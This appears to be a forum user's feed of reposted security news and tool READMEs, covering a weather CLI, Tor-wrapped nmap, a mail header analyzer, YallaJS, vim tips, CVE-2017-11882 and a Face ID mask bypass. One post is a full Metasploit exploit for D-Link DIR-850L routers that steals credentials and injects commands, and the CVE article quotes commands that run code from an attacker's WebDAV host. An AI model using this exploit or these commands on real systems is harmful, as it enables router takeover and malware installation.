    weather Weather via the command line. Uses the darksky.net API so it's super accurate. Also includes any current weather alerts in the output. Installation Binaries darwin 386 / amd64 freebsd 386 / amd64 linux 386 / amd64 / arm / arm64 solaris amd64 windows 386 / amd64 Via Go $ go get github.com/jessfraz/weather Usage --location, -l: Your address, can be in the format of just a zipcode or a city, state, or the full address. defaults to auto locating you based off your ip --units, -u: The unit system to use. defaults to auto, other options are us, si, uk, uk2, ca for more information on units see the darksky.net api --days, -d: Days of weather to retrieve. defaults to the current weather, ie. 0 or 1 --ignore-alerts: Don't print alerts in weather output. defaults false --hide-icon: Hide the weather icons from being output. defaults false --server, -s: Weather API server uri defaults to "https://geocode.jessfraz.com" Examples # get the current weather in your current location $ weather # change the units to metric $ weather -l "Paris, France" -u si # it will auto guess the units though so changing # the location to paris will change the units to `si` $ weather -l "Paris, France" # get three days forecast for NY $ weather -l 10028 -d 3 # or you can autolocate and get three days forecast $ weather -d 3 # get the weather in Manhattan Beach, CA # even includes alerts $ weather -l "Manhattan Beach, CA" # .;odc # ;kXNNNO # .0NNO0NN: # 'XNK; dNNl # KNX' 'XNK. # ,NNk cXNK, # ,NNk '0NNO:. # .'cXNXl;,. ,xXNNKOxxxk0Xx # 'lOXNNNNNNNNNNXOo' ':oxkOXNNXc # cKNNKd:'. ..;d0NNKl ,xXNK, # .;:cclKNXd. .oXNXxOXNNXl # .cOXNNNNNNNO. .kNNNNNNNXOc. # lXNXx;. . . .;dXNXo # ONNd. oXN0. # dNNo cNNk # XNN. NNX # 0NN' .NNK # ;XN0. .ONNc # ;XNXo. .lXNX: # .oXNX0dlcclx0Xo. .oXKxlccldOXNXd. # ,lk0KXXK0xKNN0o;.. ..;o0NNKx0KXXX0ko, # 'lOXNNNNNNNNNNXOo, # :x0XNNX0x:. # # # Current weather is Partly Cloudy in Manhattan Beach in California for July 14 at 4:14am EDT # The temperature is 69.2°F, but it feels like 69.2°F # # Special Weather Statement for Los Angeles, CA # ...THREAT OF MONSOONAL THUNDERSTORMS LATE TONIGHT THROUGH WEDNESDAY... # A STRONG UPPER LEVEL HIGH PRESSURE SYSTEM CURRENTLY CENTERED OVER NEVADA # WILL BRING INCREASING EAST TO SOUTHEAST FLOW OVER SOUTHERN # CALIFORNIA. AS A RESULT...A SIGNIFICANT SURGE OF MONSOONAL MOISTURE # WILL MOVE INTO SOUTHWEST CALIFORNIA LATE TONIGHT THROUGH WEDNESDAY. # THE GREATEST THREAT OF SHOWERS AND THUNDERSTORMS WILL BE ACROSS THE # MOUNTAINS AND ANTELOPE VALLEY LATE TONIGHT INTO TUESDAY. DUE TO THE # EASTERLY UPPER LEVEL FLOW ON MONDAY...THERE WILL ALSO BE A SLIGHT # CHANCE OF SHOWERS AND THUNDERSTORMS ACROSS MOST COASTAL AND VALLEY # AREAS. # THE DEEPER MONSOONAL MOISTURE WILL BRING THE POTENTIAL FOR BRIEF HEAVY # RAINFALL WITH STORMS THAT DEVELOP ON MONDAY AND TUESDAY...ESPECIALLY # ACROSS THE MOUNTAINS AND ANTELOPE VALLEY. WHILE STORMS ARE EXPECTED # TO BE FAST MOVING...THERE WILL BE THE POTENTIAL FOR LOCALIZED FLOODING # OF ROADWAYS AND ARROYOS. ON TUESDAY...THE THREAT OF THUNDERSTORMS IS # EXPECTED TO REMAIN CONFINED TO THE MOUNTAINS AND DESERTS. WITH WEAKER # UPPER LEVEL WINDS ON TUESDAY...STORMS WILL LIKELY MOVE SLOWER. AS A # RESULT...THERE WILL BE AN INCREASED THREAT OF FLASH FLOODING. # IT WILL NOT BE AS HOT ACROSS MUCH OF THE REGION TOMORROW DUE TO THE # INCREASED MOISTURE AND CLOUD COVERAGE...WITH INTERIOR SECTIONS # GENERALLY REMAINING IN THE 90S. HOWEVER...THERE WILL BE A # SIGNIFICANT INCREASE IN HUMIDITY ON MONDAY THAT WILL CONTINUE TO # BRING DISCOMFORT. # ANYONE PLANNING OUTDOOR ACTIVITIES IN THE MOUNTAINS AND DESERTS # DURING THE NEXT FEW DAYS SHOULD CAREFULLY MONITOR THE LATEST # NATIONAL WEATHER SERVICE FORECASTS AND STATEMENTS DUE TO THE # POTENTIAL HAZARDS ASSOCIATED WITH THUNDERSTORMS. # Created: July 13 at 10:50pm EDT # Expires: July 14 at 7:00pm EDT # # Ick! The humidity is 85% # The nearest storm is 18 miles NE away # The wind speed is 3.96 mph SE # The cloud coverage is 35% # The visibility is 9.58 miles # The pressure is 1012.99 mbar Makefile Usage $ make help all Runs a clean, build, fmt, lint, test, vet and install build Builds a dynamic executable or package clean Cleanup any build binaries or packages cross Builds the cross compiled binaries, creating a clean directory structure (eg. GOOS/GOARCH/binary) fmt Verifies all files have men `gofmt`ed install Installs the executable or package lint Verifies `golint` passes release Builds the cross compiled binaries, naming them in such a way for release (eg. binary-GOOS-GOARCH) tag Create a new git tag to prepare to build a release test Runs the go tests vet Verifies `go vet` passes Download weather-master.zip Source
  10. Fi8sVrs
    Scan .onion hidden services with nmap using Tor, proxychains and dnsmasq in a minimal alpine Docker container. docker-onion-nmap Use nmap to scan hidden "onion" services on the Tor network. Minimal image based on alpine, using proxychains to wrap nmap. Tor and dnsmasq are run as daemons via s6, and proxychains wraps nmap to use the Tor SOCKS proxy on port 9050. Tor is also configured via DNSPort to anonymously resolve DNS requests to port 9053. dnsmasq is configured to with this localhost:9053 as an authority DNS server. Proxychains is configured to proxy DNS through the local resolver, so all DNS requests will go through Tor and applications can resolve .onion addresses. Example: $ docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion [tor_wait] Wait for Tor to boot... (might take a while) [tor_wait] Done. Tor booted. [nmap onion] nmap -p 80,443 facebookcorewwwi.onion [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.12 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:17 UTC [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK Nmap scan report for facebookcorewwwi.onion (224.0.0.1) Host is up (2.7s latency). PORT STATE SERVICE 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 3.58 seconds How it works: When the container boots, it launches Tor and dnsmasq as daemons. The tor_wait script then waits for the Tor SOCKS proxy to be up before executing your command. Arguments: By default, args to docker run are passed to /bin/nmap which calls nmap with args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com). For example, this: docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion In addition to the custom script for nmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or nc as the first argument to docker run. For example: docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion and docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion If you want to call any other command, including the original /usr/bin/nmap or /usr/bin/nc or /usr/bin/curl you can specify it as the first argument to docker run, e.g.: docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion Environment variables: There is only one environment variable: DEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted to connections to Tor while waiting for it to boot). Example: $ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion [tor_wait] Wait for Tor to boot... (might take a while) [tor_wait retry 0] Check socket is open on localhost:9050... [tor_wait retry 0] Socket OPEN on localhost:9050 [tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )... [tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again... [tor_wait retry 1] Check socket is open on localhost:9050... [tor_wait retry 1] Socket OPEN on localhost:9050 [tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )... [tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again... [tor_wait retry 2] Check socket is open on localhost:9050... [tor_wait retry 2] Socket OPEN on localhost:9050 [tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )... [tor_wait retry 2] SOCKS proxy UP on localhost:9050 [tor_wait] Done. Tor booted. [nmap onion] nmap -p 80,443 facebookcorewwwi.onion [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.12 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK Nmap scan report for facebookcorewwwi.onion (224.0.0.1) Host is up (2.8s latency). PORT STATE SERVICE 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds Notes: No UDP available over Tor Tor can take 10-20 seconds to boot. If this is untenable, another option is to run the proxy in its own container, or run it as the main process and then run "exec" to call commands like nmap gr33tz @jessfraz tor-proxy @zuazo alpine-tor-docker shellhacks crypto-rebels.de Download: docker-onion-nmap-master.zip or git clone https://github.com/milesrichardson/docker-onion-nmap.git Source
  11. Fi8sVrs
    What is MHA: Mail header analyzer is a tool written in flask for parsing email headers and converting them to a human readable format and it also can: Identify hop delays. Identify the source of the email. Identify hop country. MHA is an alternative for the following: Name Dev Issues MessageHeader Google Not showing all the hops. EmailHeaders Mxtoolbox Not accurate and slow. Message Header Analyzer Microsoft Broken UI. Installation: Install system dependencies: sudo apt-get update sudo apt-get install python-pip sudo pip install virtualenv Create a Python virtual environment and activate it: virtualenv virt source virt/bin/activate Clone the GitHub repo: git clone https://github.com/lnxg33k/MHA.git Install Python dependencies: cd MHA pip install -r requirements.txt Run the development server: python server.py -d You can change the bind address or port by specifying the appropriate options: python server.py -b 0.0.0.0 -p 8080 Everything should go well, now visit: http://localhos:8080 Docker A Dockerfile is provided if you wish to build a docker image. docker build -t mha:latest . You can then run a container with: docker run -d -p 8080:8080 mha:latest Download MHA-master.zip Source: https://github.com/lnxg33k/MHA
  12. Fi8sVrs
    You should be extra careful when opening files in MS Office. When the world is still dealing with the threat of 'unpatched' Microsoft Office's built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers. The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update. Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document. The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents. However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user. Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions. DEMO: Exploitation Allows Full System Take Over Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software. This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847). Possible Attack Scenario: While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below: "By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)." "One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker." "Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient." "After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service." Protection Against Microsoft Office Vulnerability With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory. So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers. Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security. Users can run the following command in the command prompt to disable registering of the component in Windows registry: reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 For 32-bit Microsoft Office package in x64 OS, run the following command: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 Besides this, users should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro). Via thehackernews.com
  13. Fi8sVrs
    This Metasploit module leverages an unauthenticated credential disclosure vulnerability to execute arbitrary commands on DIR-850L routers as an authenticated user. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'openssl' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'DIR-850L (Un)authenticated OS Command Exec', 'Description' => %q{ This module leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands on DIR-850L routers as an authenticated user. Unable to use Meterpreter payloads. }, 'Author' => [ 'Mumbai', # https://github.com/realoriginal (module) 'Zdenda' # vuln discovery ], 'References' => [ ['URL', 'https://www.seebug.org/vuldb/ssvid-96333'], ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'], ], 'DisclosureDate' => 'Aug 9 2017', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp' }, 'Privileged' => true, 'Payload' => { 'DisableNops' => true, }, 'Targets' => [[ 'Automatic', {} ]], )) end def check begin res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res && res.headers['Server'] auth = res.headers['Server'] if auth =~ /DIR-850L/ if auth =~ /WEBACCESS\/1\.0/ return Exploit::CheckCode::Safe else return Exploit::CheckCode::Detected end end end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def report_cred(opts) service_data = { address: opts[:ip], port: opts[:port], service_name: opts[:service_name], protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end # some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well... # should write an auxiliary module to-do -> WRITE AUXILIARY def retrieve_creds begin xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" xml << "<postxml>\r\n" xml << "<module>\r\n" xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n" xml << "</module>\r\n" xml << "</postxml>" res = send_request_cgi({ 'uri' => '/hedwig.cgi', 'method' => 'POST', 'encode_params' => false, 'headers' => { 'Accept-Encoding' => 'gzip, deflate', 'Accept' => '*/*' }, 'ctype' => 'text/xml', 'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}", 'data' => xml, }) if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue parse = res.get_xml_document username = parse.at('//name').text password = parse.at('//password').text vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}") loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body) print_good("#{peer} - Downloaded credentials to #{loot}") return username, password else fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained") end rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def retrieve_uid begin res = send_request_cgi({ 'uri' => '/authentication.cgi', 'method' => 'GET', }) parse = res.get_json_document uid = parse['uid'] challenge = parse['challenge'] return uid, challenge rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def login(username, password) uid, challenge = retrieve_uid begin hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase send_request_cgi({ 'uri' => '/authentication.cgi', 'method' => 'POST', 'data' => "id=#{username}&password=#{hash}", 'cookie' => "uid=#{uid}" }) return uid rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def execute_command(cmd, opts) uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" payload << "<postxml>\r\n" payload << "<module>\r\n" payload << " <service>DEVICE.TIME</service>\r\n" payload << " <device>\r\n" payload << " <time>\r\n" payload << " <ntp>\r\n" payload << " <enable>1</enable>\r\n" payload << " <period>604800</period>\r\n" payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n" payload << " </ntp>\r\n" payload << " <ntp6>\r\n" payload << " <enable>1</enable>\r\n" payload << " <period>604800</period>\r\n" payload << " </ntp6>\r\n" payload << " <timezone>20</timezone>\r\n" payload << " <time/>\r\n" payload << " <date/>\r\n" payload << " <dst>0</dst>\r\n" payload << " <dstmanual/>\r\n" payload << " <dstoffset/>\r\n" payload << " </time>\r\n" payload << " </device>\r\n" payload << "</module>\r\n" payload << "</postxml>" begin # save configuration res = send_request_cgi({ 'uri' => '/hedwig.cgi', 'method' => 'POST', 'ctype' => 'text/xml', 'data' => payload, 'cookie' => "uid=#{uid}" }) # execute configuration res = send_request_cgi({ 'uri' => '/pigwidgeon.cgi', 'method' => 'POST', 'data' => 'ACTIONS=SETCFG,ACTIVATE', 'cookie' => "uid=#{uid}" }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def exploit print_status("#{peer} - Connecting to target...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url") end # # Information Retrieval, obtains creds and logs in # @username, @password = retrieve_creds execute_cmdstager( :flavor => :wget, :linemax => 200 ) end end Download dlink_dir850l_unauth_exec.rb.txt Source
  14. Fi8sVrs
    Note: If you’re decent at vim and want your mind blown, check out Advanced Vim. I’ve compiled a list of essential vim commands that I use every day. I then give a few instructions on how to making vim as great as it should be, because it’s painful without configuration. Cursor movement (Inside command/normal mode) w - jump by start of words (punctuation considered words) W - jump by words (spaces separate words) e - jump to end of words (punctuation considered words) E - jump to end of words (no punctuation) b - jump backward by words (punctuation considered words) B - jump backward by words (no punctuation) 0 - (zero) start of line ^ - first non-blank character of line (same as 0w) $ - end of line Advanced (in order of what I find useful) Ctrl+d - move down half a page Ctrl+u - move up half a page } - go forward by paragraph (the next blank line) { - go backward by paragraph (the next blank line) gg - go to the top of the page G - go the bottom of the page : [num] [enter] - Go To that line in the document Searching f [char] - Move to the next char on the current line after the cursor F [char] - Move to the next char on the current line before the cursor t [char] - Move to before the next char on the current line after the cursor T [char] - Move to before the next char on the current line before the cursor All these commands can be followed by ; (semicolon) to go to the next searched item, and , (comma) to go the the previous searched item Insert/Appending/Editing Text Results in insert mode i - start insert mode at cursor I - insert at the beginning of the line a - append after the cursor A - append at the end of the line o - open (append) blank line below current line (no need to press return) O - open blank line above current line cc - change (replace) an entire line c [movement command] - change (replace) from the cursor to the move-to point. ex. ce changes from the cursor to the end of the cursor word Esc - exit insert mode r [char] - replace a single character with the specified char (does not use insert mode) d - delete d - [movement command] deletes from the cursor to the move-to point. ex. de deletes from the cursor to the end of the current word dd - delete the current line Advanced J - join line below to the current one Marking text (visual mode) v - starts visual mode From here you can move around as in normal mode (hjkl etc.) and can then do a command (such as y, d, or c) V - starts linewise visual mode Ctrl+v - start visual block mode Esc - exit visual mode Advanced O - move to Other corner of block o - move to other end of marked area Visual commands Type any of these while some text is selected to apply the action y - yank (copy) marked text d - delete marked text c - delete the marked text and go into insert mode (like c does above) Cut and Paste yy - yank (copy) a line p - put (paste) the clipboard after cursor P - put (paste) before cursor dd - delete (cut) a line x - delete (cut) current character X - delete previous character (like backspace) Exiting :w - write (save) the file, but don't exit :wq - write (save) and quit :q - quit (fails if anything has changed) :q! - quit and throw away changes Search/Replace /pattern - search for pattern ?pattern - search backward for pattern n - repeat search in same direction N - repeat search in opposite direction :%s/old/new/g - replace all old with new throughout file (gn is better though) :%s/old/new/gc - replace all old with new throughout file with confirmations Working with multiple files :e filename - Edit a file :tabe - make a new tab gt - go to the next tab gT - go to the previous tab Advanced :vsp - vertically split windows ctrl+ws - Split windows horizontally ctrl+wv - Split windows vertically ctrl+ww - switch between windows ctrl+wq - Quit a window Marks Marks allow you to jump to designated points in your code. m{a-z} - Set mark {a-z} at cursor position A capital mark {A-Z} sets a global mark and will work between files ‘{a-z} - move the cursor to the start of the line where the mark was set ‘’ - go back to the previous jump location General u - undo Ctrl+r - redo . - repeat last command Making Vim actually useful Vim is quite unpleasant out of the box. For example, typeing :w for every file save is awkward and copying and pasting to the system clipboard does not work. But a few changes will get you much closer to the editor of your dreams. .vimrc My .vimrc file has some pretty great ideas I haven't seen elsewhere. This is a minimal vimrc that focuses on three priorities: adding options that are strictly better (like more information showing in autocomplete) more convenient keystrokes (like [space]w for write, instead of :w [enter]) a similar workflow to normal text editors (like enabling the mouse) Installation Copy this to your home directory and restart vim. Read through it to see what you can now do (like [space]w to save a file) mac users - making a hidden normal file is suprisingly tricky. Here’s one way: in the command line, go to the home directory type nano .vimrc paste in the contents of the .vimrc file ctrl+x, y, [enter] to save You should now be able to press [space]w in normal mode to save a file. [space]p should paste from the system clipboard (outside of vim). If you can’t paste, it’s probably because vim was not built with the system clipboard option. To check, run vim --version and see if +clipboard exists. If it says -clipboard, you will not be able to copy from outside of vim. For mac users, homebrew install vim with the clipboard option. Install homebrew and then run brew install vim. then move the old vim binary: $ mv /usr/bin/vim /usr/bin/vimold restart your terminal and you should see vim --version now with +clipboard Plugins The easiest way to make vim more powerful is to use Vintageous in sublime (version 3). This gives you Vim mode inside sublime. I suggest this (or a similar setup with the Atom editor) if you aren't a vim master. Check out Advanced Vim if you are. Vintageous is great, but I suggest you change a few settings to make it better. Clone this repository to ~/.config/sublime-text-3/Packages/Vintageous, or similar. Then check out the "custom" branch. Alternatively, you can get a more updated Vintageous version by cloning the official repo and then copying over this patch. Change the user settings (User/Preferences.sublime-settings) to include: "caret_style": "solid" This will make the cursor not blink, like in vim. sublime might freeze when you do this. It’s a bug; just restart sublime after changing the file. ctrl+r in vim means "redo". But there is a handy ctrl+r shortcut in sublime that gives an "outline" of a file. I remapped it to alt+r by putting this in the User keymap { "keys": ["alt+r"], "command": "show_overlay", "args": {"overlay": "goto", "text": "@"} }, Add the ability to toggle vintageous on and off Mac users: you will not have the ability to hold down a navigation key (like holding j to go down). To fix this, run the commands specified here: https://gist.github.com/kconragan/2510186 Now you should be able to restart sublime and have a great vim environment! Sweet Dude. Switch Caps Lock and Escape I highly recommend you switch the mapping of your caps lock and escape keys. You'll love it, promise! Switching the two keys is platform dependent; google should get you the answer Other I don’t personally use these yet, but I’ve heard other people do! :wqa - Write and quit all open tabs (thanks Brian Zick) Source: http://vimsheet.com/
  15. Fi8sVrs
    l'd like to take his... his Face ID... off Video Apple's facial-recognition login system in its rather expensive iPhone X can be, it is claimed, fooled by a 3D printed mask, a couple of photos, and a blob of silicone. Bkav Corporation, an tech security biz with offices in the US and Singapore, specializes in bypassing facial-recognition systems, and set out to do the same with Face ID when it got hold of a $999 iPhone X earlier this month. The team took less than a week to apparently crack Cupertino's vaunted new security mechanism, demonstrating that miscreants can potentially unlock a phone with a mask of the owner's face. "Everything went much more easily than you expect. You can try it out with your own iPhone X, the phone shall recognize you even when you cover a half of your face," the biz said in an advisory last updated on Saturday. "It means the recognition mechanism is not as strict as you think, Apple seems to rely too much on Face ID's AI. We just need a half face to create the mask. It was even simpler than we ourselves had thought." After registering a person's face on the phone – and the handset should only unlock when it sees this face – the team built a 3D printed mask of the test subject using an off-the-shelf 3D printer. They then put 2D printouts of the user's eyes, upper cheekbones and lips over the mask and added a silicone nose for realism. The creation wasn't able to defeat Face ID at first, as other folks with the same idea have found. But by sculpting and shading the false nose on one side to imitate shadow – plus a few other tweaks – the team managed to use the mask to fool the iPhone X into unlocking, it is claimed. The hack was cheap – Bkav estimates the total cost in materials for a face to hoodwink Face ID was around $150. It acknowledged that the hack isn’t for everyone to try out. It requires an in-depth knowledge of how Apple's face-scanning software works and what the weak points in the system are. "With Face ID's being beaten by our mask, FBI, CIA, country leaders, leaders of major corporations, etc are the ones that need to know about the issue, because their devices are worth illegal unlock attempts," it said. "Exploitation is difficult for normal users, but simple for professional ones." The team is still researching how to crack the system more easily and refining their methods. In the meantime the biz advises sticking to fingerprints for biometric security. ® Via theregister.co.uk
      • 3
      • Upvote
  16. Fi8sVrs
    YallaJS makes it easy to create HtmlTemplate and render it to DOM efficiently. import {Context,render} from 'yallajs'; // we pull html Tagged Template literals from the Context object. let {html} = new Context(); // create template function that produce HtmlTemplate "<div>Hello xxx </div>" let hello = (param) => html`<div>Hello ${name}</div>`; // render <div>Hello world</div> to document.body. render(hello('world'),document.body); // render <div>Hello yallajs</div> to document.body. render(hello('yallajs'),document.body); yallajs has 3 main API render : Render is a function that renders an HtmlTemplate or HtmlTemplateCollection into node. html : html is contextual Tagged Template Literal that generates HtmlTemplate object from Html strings htmlCollection : htmlCollection is contextual Tagged Template Literals that generates HtmlTemplateCollection for rendering arrays of object. Context : Context is an object that stores local information such as HtmlTemplate cache (in most cases you dont have to do anything with this object). Motivation yallajs has following main goals : Highly efficient in DOM creation, updates and deletion. Easy to use and very simple to understand Using web standards instead of creating new ones Very small size and no dependency. Support ES 5 browsers suchas IE 9, IOS 6 and Android 5. How it works html Tagged Template Literals html tag expression processed Template Literal, and generate HtmlTemplate object out of it. Template literals are string literals allowing embedded expressions. You can use multi-line strings and string interpolation features with them. Template literals are enclosed by the back-tick (` `) character instead of double or single quotes. Template literals can contain place holders. These are indicated by the Dollar sign and curly braces (${expression}). The expressions in the place holders and the text between them get passed to a html Tagged Template Literals. render HtmlTemplate rendering render() takes a HtmlTemplate, HtmlTemplateCollection, Text or Promise, and renders it to a DOM Container. The process of rendering is describe in following orders : yallajs take the static strings in HtmlTemplate and join the strings with <!--outlet--> to mark the position of dynamic parts. yallajs passes joined strings to innerHTML to create DOMTemplate. It walks through the DOMTemplate and identify the comment tag outlet. On initial rendering yallajs update the outlet with actual values. After that yallajs store the updated DOMTemplate into Context object. Lastly yallajs clone the DOMTemplate to create HtmlTemplateInstance and append it to DOM Container. By keeping the template DOM in the cache, next DOM creation will be done in two steps only : look the template DOM, and update the outlet with next value, clone the template DOM and append it to DOM Container. In this way we can also perform the DOM update process very efficiently because we already know the location of the placeholder. So if there is a new value that changes, we simply update the placeholder without having to touch other DOM Performance The Benchmark result of yallajs 2.0 beta version is very promising. With very early stage of performance tuning, yallajs wins against angular, react and vue, both on rendering and memory allocation. Following benchmark result using Stefan Krause performance benchmark. Memory On the other hand, yallajs memory usage is showing very promising result. You can find the details here, and the code that we use in this benchmark here. Features Yalla uses ES 2015 String literal for html templating, yallajs API is very simple, making yalla js almost invisible in your code. This makes your application smells good and no boilerplate. Overview Events function buttonListener(){ alert('hello'); } render(html`<input type="button" onclick="${e => buttonListener()}">`,document.body); Attribute render(html`<div style="color : ${dynamicColor}; font-size : ${fontSize};" >This is a Node</div>`,document.body); HtmlTemplate in HtmlTemplate render(html`<div>This is Parent Node ${html`<div>This is Child Node</div>`} </div>`,document.body); htmlCollection HtmlTemplateCollection HtmlTemplateCollection is high performance Object that map array of items to HtmlTemplate Array. HtmlTemplateCollection requires key of the item to update the collection effectively. htmlCollection(arrayItems,keyFunction,templateFunction); Example let marshalArtArtist = [ {id:1,name:'Yip Man'}, {id:2,name:'Bruce Lee'}, {id:3,label:'Jackie Chan'}] render(html` <table> <tbody> ${htmlCollection(marshalArtArtist,(data) => data.id, (data,index) => html` <tr><td>${data.name}</td></tr> `)} <tbody> </table> `,document.body); Sample Project TodoMVC : a simple todomvc application Benchmark : benchmark tools for measuring performance, fork of Stefan Krause github project Codepen sample Hello world : Basic hello world application Simple Calculator : Simple calculator with yallajs Color Picker : Simple color picker Async : Example using Promise for async Html Collection : Using HtmlCollection to render arrays Hero Editor : Hero Editor tutorial from Angular JS rewritten in Yallajs Download: yalla-master.zip or git clone https://github.com/yallajs/yalla.git Source: https://github.com/yallajs/yalla
  17. Fi8sVrs
    bun la ce te referi? speed, anonymity, etc..
  18. Fi8sVrs
